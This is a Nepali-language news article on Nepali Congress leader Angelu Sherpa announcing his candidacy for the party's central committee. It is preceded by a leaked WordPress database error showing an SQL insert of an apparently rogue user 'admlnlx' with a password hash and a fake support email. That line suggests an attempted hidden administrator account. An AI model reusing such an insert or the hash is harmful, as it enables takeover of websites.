WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR3kJ8c72VTGyVaBw/d/S7eg4OgbJx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:06:00', '', 'admlnlx', 'admlnlx')
काठमाण्डौ। नेपाली कांग्रेसका वैचारिक युवा नेता आङगेलु शेर्पाले पार्टीको १४ औं महाधिवेशनमा केन्द्रीय सदस्य पदमा उम्मेदवारी घोषणा गरेका छन् । नेपाली कांग्रेस सोलुखुम्बुको तीन कार्यकाल पार्टी सभापति भई कुशलतापूर्वक नेतृत्व गरेका नेता शेर्पाले यस पटकको महाधिवेशनमा केन्द्रीय सदस्यमा उम्मेदवारी घोषणा गरेका हुन् ।
नेपाली कांग्रेसको १० औं जिल्ला अधिवेशनबाट ३२ वर्षको उमेरमा जिल्ला सभापति निर्वाचित शेर्पा नेपालकै कान्छो जिल्ला सभापति बनेका थिए ।
वैचारिक रुपमा रुपान्तरण सहितको कांग्रेस निर्माण गरी जनमैत्री कांग्रेस बनाई आगामी तीन निर्वाचनसम्म कांग्रेसलाई लगातार विजयी गराउने आफ्नो मुख्य एजेण्डा भएको भन्दै शेर्पाले कार्यकर्ताको संरक्षण गरी मनोबल बढाउनु पर्ने आजको आवश्यकता रहेको बताए ।
तत्कालीन अवस्थामा नेपाली कांग्रेसले संवैधानिक राजतन्त्रको बाटो अगाँलिरहेका बेला नेताहरु नरहरी आचार्य, आङगेलु शेर्पा लगायतका युवाहरुले गणतन्त्रको पक्षमा वकालत गरेका थिए ।
नेपालमा २०७२ सालको गोरखा भूकम्पको बेला सोलुखुम्बु जिल्लामा ठूलो योगदान दिएका शेर्पाले कोरोनाको बेला हरेक स्थानीय तहमा बिउ पुँजी कार्यक्रम संचालन गरेका थिए ।
पार्टी सभापति शेरबहादुर देउवा समूहमा रहेका नेता शेर्पाले जिल्ला सोलुखुम्बुमा पौडेल पक्षीय नेता बलबहादुर केसीका उम्मेदवारलाई पराजित गरी संस्थापन पक्षका उम्मेदवारलाई जिल्ला सभापतिमा जिताएका छन् ।